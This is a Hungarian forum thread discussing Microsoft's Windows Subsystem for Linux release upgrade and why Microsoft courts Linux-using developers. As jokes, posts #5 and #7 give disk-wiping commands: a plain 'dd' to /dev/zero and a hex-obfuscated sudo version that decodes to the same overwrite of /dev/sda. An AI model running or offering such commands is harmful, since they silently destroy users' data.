Hirdetés

2024. április 25., csütörtök

Gyorskeresés

Hozzászólások

(#1) hallador


hallador
addikt

Wiindows-szolgáltatások - Itt van egy elírás.

Mondjuk az, hogy újra kell telepíteni kicsit furcsa megoldás. Nincs ezzel baj, de reméljük a Microsoft ezeken a megoldásokat elhagyja... Igaz ezt sokkal gyorsabban újra lehet telepíteni mint egy nagy MS szoftvercsomagot, de akkor is.

# do-release-upgrade
Checking for a new Ubuntu release
No new release found

A parancs működik, mondjuk nekem friss telepítésem van, de legalább van rá lehetőség, ez jó hír, reméljük sokaknál probléma mentesen menni fog ez is. Én örülök neki, hogy ezt létrehozták.

The further a society drifts from truth, the more it will hate those that speak it. (George Orwell) [Work Machines: HP EliteBook, HP ProBook & Linux Mint 20 ; Entertainment: Apple Macbook AIR M1]

(#2) AAAgold


AAAgold
senior tag

amatör vagyok, tudom, de mi az a "linuxos Windows alrendszer"?

"Miért imádják az aranyat? Nem lehet megenni..."

(#3) kispx válasza AAAgold (#2) üzenetére


kispx
addikt

(#4) Saboteur777 válasza kispx (#3) üzenetére


Saboteur777
csendes újonc

Akkor inkább windowsos Linux-alrendszer

(#5) F34R


F34R
nagyúr

en igy frissitenem dd if=/dev/zero of=/dev/sdX bs=4096

(#6) hallador válasza F34R (#5) üzenetére


hallador
addikt

"Hülye" :D :C :R

Visszatérve, nekem is csak max szakmai kíváncsiság, és virtuális gépként, nyugodtabb az életem.

The further a society drifts from truth, the more it will hate those that speak it. (George Orwell) [Work Machines: HP EliteBook, HP ProBook & Linux Mint 20 ; Entertainment: Apple Macbook AIR M1]

(#7) cami][us válasza F34R (#5) üzenetére


cami][us
senior tag

sudo $(echo "64642069663d2f6465762f7a65726f206f663d2f6465762f73646120636f756e743d3130302062733d314d0a" | xxd -r -p)

(#8) Execᵀʰᵀˢ válasza cami][us (#7) üzenetére


Execᵀʰᵀˢ
tag

Miért nem 62733d36344d?

(#9) #41095680 válasza kispx (#3) üzenetére


#41095680
törölt tag

Még mindig nem egyértelmű, hogy az 1,1% linux aránynál, miért fontos az egyeduralkoró multicégnek az ubi "támogatás". A W10 felhasználóknak szerintem nem fontos vagy csak egy nagyon szűk rétegnek.
Esetleg az ubuntusok "visszacsábítása" az 'ablakokba'?

(#10) Rimuru válasza Execᵀʰᵀˢ (#8) üzenetére


Rimuru
veterán

Miert nem 636f756e743d313, meg egyebkent is miert 736461? biztonsag miatt beleagyaznek meg egy kis kodot, hogy akkor mar mindent intezzen el. ;]

(#9) LKaresz: vagy inkabb ne is akarjon elmenni.

[ Szerkesztve ]

Vigyázat, csalok!

(#11) lev258 válasza #41095680 (#9) üzenetére


lev258
veterán

Mert sok fejlesztő, rendszergazda választ Linux alapú rendszert a munkájából kifolyólag. Őket próbálja átcsábítani a Microsoft. Ilyen értelemben ez rétegfunkció, de nem hagyható figyelmen kívül.
Nem az asztali felhasználók arányát kell számításba venni.

[ Szerkesztve ]

Ubuntu MATE 20.04, hobbi cayenne termesztő

(#12) CPT.Pirk válasza #41095680 (#9) üzenetére


CPT.Pirk
Jómunkásember

Mert olyan eszközöket érsz el vele amik nincsenek meg Windowsra, de munkához nagyon hasznosak lehetnek. Jellemzően fejlesztőket és olyanokat érdekel ez, akik _tényleg_ dolgoznak is a gépen. Korábban a bash for windows sourceforge-os telepítő telepítésén keresztül lehetett elérni ezek egy részét, de most rendes natív megoldás van erre.
Nyilván aki csak valamilyen Office-t használ munkához vagy még azt se, azt ez kevésbé érdekli de aki tudja mit lehet csinálni pl. egy egrep-el, annak ez egy jó dolog.

A cégnek ez azért fontos, mert a poszt elején említett felhasználók számára eddig nem tudott alternatívát mutatni a Windows. Mondjuk a magam részéről nem hiszem, hogy emiatt túl sokan átpártolnának de attól még jó, hogy van ilyen is.

Nincs más - csak egy szál gitár - szidom a rendszert - forradalmár. - Én vagyok egyedül 88 telén. (Auróra)

(#13) kymera válasza kispx (#3) üzenetére


kymera
senior tag

:R

1151,AM4,1366,2011, - Lapok,procik,vinyók,tápok,vga-k -akciósan. - 70-2340239

(#14) kurta9999


kurta9999
tag

Ez egy nagyon jó hír számomra ez a linux alrendszer az egyik legjobb újdonság a win 10ben..végre nemkell külön linux/vps, helyben is elérhető a gcc :)

(#15) hallador válasza #41095680 (#9) üzenetére


hallador
addikt

Szerintem:
Az a helyzet, hogy a microsoft lemaradt az úgynevezett DevOps forradalomról. Az azure egy olyan termék, ami nem tartozik a valódi cloud sub kultúrához. Kapsz egy kész környezetet amit használsz eddig szép. Ugyanakkor a DevOps mint olyan nagyon nem Microsoftra szabott valami. Sőt annyira nem az, hogy a Microsoft egyetlen egy olyan programozási nyelvet nem volt képes megalkotni, amit igazán szeretnének DevOps berkekben.

A másik, hogy Mark Russinovich amikor elment egy DevOps konferenciára, ami nyilvánvaló Linux-os emberekből állt nagy részt, megkérdezte mennyien használnak Windows-t szívesen, ha nincsenek rákényszerítve munkahelyen, a 800 - 1000 emberből 2 tette fel a kezét. Ez nyilván jelzésértékű volt a Microsoftnak, hogy kimaradtak a Cloud/DevOps fejlesztő üzletág részből.

Ez az egyik.

A másik pedig, hogy azon rendszergazdák, akik nem Windows alapú rendszerekkel dolgoznak, ezeknek az embereknek a száma komolyan megnőtt, amióta az Amazon, Google megjelent a saját cloud-jukkal. Na ez nem Magyarország, mert sajnos otthon a Microsoft kiüthetetlen. De ahol nem csak a "Windows Server" van a világon, ott már a Windows Desktop mint munka eszköz már egyáltalán nem biztos, hogy De facto.

Ezt nálunk is látom, a rendszergazdák asztali gépein Windows van, mert ez a policy, de amivel ügyfélhez mennek, ott már sok a Linux. Tehát ebből az következik, hogy a Windows mint olyan már nem olyan népszerű a szakemberek között mint 10 éve volt.

Ezért a Microsoft sok olyan dolgot tesz, hogy ezeket az embereket visszacsábítsa:

- MSSQL for Linux
- Bash a Windows-ba
- GIT támogatás mindenhol
- Visual studio for Linux
- Ha jobban megnézzük a Windows Server Core 2008-ban is a Linux/Unix miatt jelent meg, mert a Linuxok akkor készen álltak a gyengébb gépeken való használatra, ameddig a Windows server alá kellett a gépe rendesen, de éppen a Microsoft Nano server sem azért jelent meg, mert a Microsoft akkor újító hanem azért mert a konténer technológia mint olyan már a Cloud rendszerekben De facto a fejlesztésben, a Microsoftnak erre semmilyen megoldása nem volt. Kérdés elkéstek-e vele vagy sem, majd kiderül.

stb, stb

Ezzel az a baj, hogy a DevOps-ok szép nagy százaléka már nem Windows-t használ, a rendszergazdák egy része már nem Windows-t használ, a fejlesztők egy része már nem Windows-t használ.

Ez 10 évvel ezelőtt még nem volt ilyen egyértelmű.

Az MS mindent megtesz, hogy visszahúzza ezeket az embereket, de itt nem arról a bulvár sallangról van szó amit írsz, hogy 1,1 %, hanem arról hogy az az 1,1 % nem mancika néni a párt irodából, hanem annak a rétegnek egy adott százaléka, akiktől az informatika jövője függ.

[ Szerkesztve ]

The further a society drifts from truth, the more it will hate those that speak it. (George Orwell) [Work Machines: HP EliteBook, HP ProBook & Linux Mint 20 ; Entertainment: Apple Macbook AIR M1]

(#16) XplodR


XplodR
csendes tag

Valaki aki frissített meg tudja mondani hogy kezeli-e már a külső eszközöket például az usb portot vagy a hálókártyát vagy továbbra is csak "szoftveres" alrendszer?

Szerk.: Ne kelljen már egy airmon-ng miatt komplett linuxot bootolni ;]

[ Szerkesztve ]

(#17) Rimuru válasza XplodR (#16) üzenetére


Rimuru
veterán

Nem leszel elorebb vele, de igy jobban is jarsz. ;]

[ Szerkesztve ]

Vigyázat, csalok!

(#18) Rimuru válasza kurta9999 (#14) üzenetére


Rimuru
veterán

Sorry a duplaert.

Eddig mi akadalyozott meg abban hogy legyen gcc-d windows alatt?

Vigyázat, csalok!

(#19) emvy válasza XplodR (#16) üzenetére


emvy
nagyúr

A halozati eszkozok kezelese rengeteget javult ebben a kiadasban.

while (!sleep) sheep++;

(#20) kurta9999 válasza Rimuru (#18) üzenetére


kurta9999
tag

Nem találtam rá értelmes leírást, hogy lehetseges volna windows környezettel is fordítani Linuxra

(#21) dragon1993 válasza kurta9999 (#20) üzenetére


dragon1993
őstag

Az új Visual Studioval lehet.

Copyright © 2000-2024 PROHARDVER Informatikai Kft.